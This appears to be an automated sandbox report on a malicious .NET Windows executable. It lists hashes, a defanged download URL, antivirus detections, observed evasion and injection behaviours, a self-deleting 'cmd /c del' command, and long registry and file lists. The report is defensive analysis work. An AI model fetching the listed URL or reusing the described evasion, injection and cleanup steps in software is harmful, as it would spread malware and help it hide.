File details | |
---|---|
File type: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
File size: | 927.50 KB (949760 bytes) |
Compile time: | 2018-11-06 12:30:04 |
MD5: | cf4e557fae0400be25950605b6b166a2 |
SHA1: | 4bfb39c6e8e766903163f087bc7f83bd1a99f637 |
SHA256: | f323201612174c46f18aeefce83d1491fe17f3504cdb87ddc6ef7c58ed65226d |
Import hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
Sections 3 | .text .rsrc .reloc |
Directories 4 | import resource debug relocation |
First submission: | 2018-11-08 12:15:05 |
Last submission: | 2018-11-08 12:15:05 |
Filename detected: |
- 1.exe (1) |
URL file hosting |
---|
hXXps://nstpictures.com.ph/images/icons/1/1.exe |
Antivirus Report | |||
---|---|---|---|
Report Date | Detection Ratio | Permalink | Update |
2018-11-07 00:03:46 | [22/67] | |
PE Sections 1 suspicious | |||||
---|---|---|---|---|---|
Name | VAddress | VSize | Size | MD5 | SHA1 |
.text | 0x2000 | 0x8d944 | 580096 | 62d424242194cfa6ec187d135d5b6e5a | 6d500d317cea4f5a47a7b87c8f6ed5a3ed3773c1 |
.rsrc | 0x90000 | 0x27e5c | 163840 | 46793e4b898713118cca1ac46336b898 | 265e2e1a9b605d6b9afd2524da3cd6d1bd2d2f48 |
.reloc | 0xb8000 | 0xc | 512 | 588754ad0a87cf27bfe8704b207759a6 | e956a50f203284ce1334d713a040dc110bd7a0cc |
Meta Info | |
---|---|
No Meta found in this file |
XOR | |
---|---|
No XOR information found in this file. |
Signature | |
---|---|
This file isn't digitally signed |
Packer(s) | |
---|---|
Microsoft Visual C# / Basic .NET | |
Microsoft Visual Studio .NET | |
.NET executable | |
Microsoft Visual C# v7.0 / Basic .NET |
File found | |
---|---|
File type: Library | |
mscoree.dll |
IP Found | |
---|---|
No IP detected |
URL(s) | |
---|---|
No URL found |
Behavior analysis details | |||||
---|---|---|---|---|---|
Machine name | Machine label | Machine manager | Started | Ended | Duration |
Seven01b_64 | Seven01b_64 | VirtualBox | 2018-11-08 12:07:09 | 2018-11-08 12:10:33 | 204 |
18 Behaviors detected by system signatures
Uses suspicious command line tools or Windows utilities
Severity: High
Confidence: High
- command: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
Created network traffic indicative of malicious activity
Severity: High
Confidence: High
- signature: Traffico Anomalo: Traffico verso host malevolo, GET HTTP Content "db" (Soc-Rule)
Anomalous binary characteristics
Severity: High
Confidence: High
- anomaly: Actual checksum does not match that reported in PE header
Checks the system manufacturer, likely for anti-virtualization
Severity: High
Confidence: Very High
Attempts to repeatedly call a single API many times in order to delay analysis time
Severity: High
Confidence: Very High
- Spam: services.exe (476) called API GetSystemTimeAsFileTime 2319118 times
Executed a process and injected code into it, probably while unpacking
Severity: High
Confidence: Very High
- Injection: 1.exe(2724) -> vbc.exe(3036)
Uses Windows utilities for basic functionality
Severity: Medium
Confidence: High
- command: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe"
Anomalous .NET characteristics
Severity: Medium
Confidence: Very High
- anomalous_version: Assembly version is set to 0
Performs some HTTP requests
Severity: Medium
Confidence: Low
HTTP traffic contains suspicious features which may be indicative of malware related traffic
Severity: Medium
Confidence: Low
- get_no_useragent: HTTP traffic contains a GET request with no user-agent header
A process created a hidden window
Severity: Medium
Confidence: Very High
- Process: wlanext.exe -> C:\Windows\SysWOW64\cmd.exe
Network activity detected but not expressed in API logs
Severity: Medium
Confidence: Very High
Dynamic (imported) function loading detected
Severity: Medium
Confidence: Very High
Guard pages use detected - possible anti-debugging.
Severity: Medium
Confidence: Very High
Anomalous file deletion behavior detected (10+)
Severity: Medium
Confidence: Very High
- DeletedFile: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER44B6.tmp
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER44B6.tmp.appcompat.txt
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER44B6.tmp.appcompat.txt
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER491C.tmp
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER491C.tmp.WERInternalMetadata.xml
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER49AA.tmp
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER49AA.tmp.hdmp
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER6EC7.tmp
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER6EC7.tmp.mdmp
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER44B6.tmp.appcompat.txt
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER491C.tmp.WERInternalMetadata.xml
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER49AA.tmp.hdmp
- DeletedFile: C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER6EC7.tmp.mdmp
Creates RWX memory
Severity: Medium
Confidence: Medium
At least one process apparently crashed during execution
Severity: Low
Confidence: Very High
SetUnhandledExceptionFilter detected (possible anti-debug)
Severity: Low
Confidence: Very High
11 Summary items with data
Files
Read Files
Write Files
C:\Users\Seven01\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\index.dat C:\Users\Seven01\AppData\Roaming\Microsoft\Windows\Cookies\index.dat C:\Users\Seven01\AppData\Local\Microsoft\Windows\History\History.IE5\index.dat C:\Users\Seven01\AppData\Roaming\6MO7-P2A\6MOlogim.jpeg C:\Windows\sysnative\LogFiles\Scm\9435f817-fed2-454e-88cd-7f78fda62c48 C:\Windows\sysnative\LogFiles\Scm\eaca24ff-236c-401d-a1e7-b3d5267b8a50 C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER44B6.tmp.appcompat.txt C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER491C.tmp.WERInternalMetadata.xml C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER49AA.tmp.hdmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER6EC7.tmp.mdmp C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_7f86ff522426a3314829b0b4bf7c44a66fbeec_cab_07fe9fbf\WER44B6.tmp.appcompat.txt C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_7f86ff522426a3314829b0b4bf7c44a66fbeec_cab_07fe9fbf\WER491C.tmp.WERInternalMetadata.xml C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_7f86ff522426a3314829b0b4bf7c44a66fbeec_cab_07fe9fbf\WER49AA.tmp.hdmp C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_7f86ff522426a3314829b0b4bf7c44a66fbeec_cab_07fe9fbf\WER6EC7.tmp.mdmp C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_taskhost.exe_7f86ff522426a3314829b0b4bf7c44a66fbeec_cab_07fe9fbf\Report.wer
Delete Files
C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER44B6.tmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER44B6.tmp.appcompat.txt C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER491C.tmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER491C.tmp.WERInternalMetadata.xml C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER49AA.tmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER49AA.tmp.hdmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER6EC7.tmp C:\Windows\ServiceProfiles\LocalService\AppData\Local\Temp\WER6EC7.tmp.mdmp
Keys
Cache\DOMStore\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\DOMStore\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\feedplat\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\iecompat\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible 
Cache\iecompat\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\ietld\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\MSHist012017011320170114\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePath 
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\PrivacIE:\CacheOptions HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheRepair HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePath HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CachePrefix HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheLimit HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Extensible Cache\UserData\CacheOptions HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Internet Settings HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\CreateUriCacheSize HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode 
HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Internet Settings\EnablePunycode HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\wlanext.exe HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_HTTP_USERNAME_PASSWORD_DISABLE\* HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings\Security_HKLM_only HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Main\FeatureControl HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562 HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\FeatureControl\FEATURE_ALLOW_REVERSE_SOLIDUS_IN_USERINFO_KB932562 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance HKEY_CLASSES_ROOT\CLSID\{FAE3D380-FEA4-4623-8C75-C6B61110B681}\Instance\Disabled HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DisableUNCCheck HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command 
Processor\EnableExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DelayedExpansion HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\DefaultColor HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\CompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\PathCompletionChar HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Command Processor\AutoRun HKEY_CURRENT_USER\Software\Microsoft\Command Processor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DisableUNCCheck HKEY_CURRENT_USER\Software\Microsoft\Command Processor\EnableExtensions HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DelayedExpansion HKEY_CURRENT_USER\Software\Microsoft\Command Processor\DefaultColor HKEY_CURRENT_USER\Software\Microsoft\Command Processor\CompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\PathCompletionChar HKEY_CURRENT_USER\Software\Microsoft\Command Processor\AutoRun HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\DcomLaunch\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcEptMapper\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\RpcSs\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\WOW64 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\ProgramData HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Public HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment 
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\Default HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonFilesDir (x86) HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramW6432Dir HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\CommonW6432Dir HKEY_USERS\S-1-5-18 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_USERS\.DEFAULT\Environment HKEY_USERS\.DEFAULT\Volatile Environment HKEY_USERS\.DEFAULT\Volatile Environment\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData 
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Environment HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\clr_optimization_v4.0.30319_64\RequiredPrivileges HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\lsass.exe HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wscsvc\ObjectName HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Time Zones\W. 
Europe Standard Time\Dynamic DST HKEY_USERS\S-1-5-19 HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-19\ProfileImagePath HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData HKEY_USERS\S-1-5-19\Environment HKEY_USERS\S-1-5-19\Volatile Environment HKEY_USERS\S-1-5-19\Volatile Environment\0 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Type HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Start HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ErrorControl HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Tag HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\DependOnService HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\DependOnGroup HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Group HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ObjectName HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\WOW64 HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\RequiredPrivileges HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Environment HKEY_CURRENT_USER\Software\Classes\AppID\taskhost.exe HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\WDI\DiagnosticModules HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NeverLowerPagePriority 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{15fba3b8-a37a-4f91-bdba-fbb98fe804bf}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{282396b2-6c46-4d66-b413-70b0445df33c}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{284ddb2f-beea-4c9d-91e8-e3670ed91517}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{3EA6B3DF-393E-41C3-9885-29EC5A701926}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NeverLowerPagePriority 
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{45DE1EA9-10BC-4f96-9B21-4B6B83DBF476}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\ImagePath HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NeverLowerPagePriority HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{4d21da64-fd02-4b82-a0a5-783266e430ab}\NameResource HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146} HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\WDI\DiagnosticModules\{50e3b0eb-5780-49de-9eb5-8d53a51fd146}\ImagePath 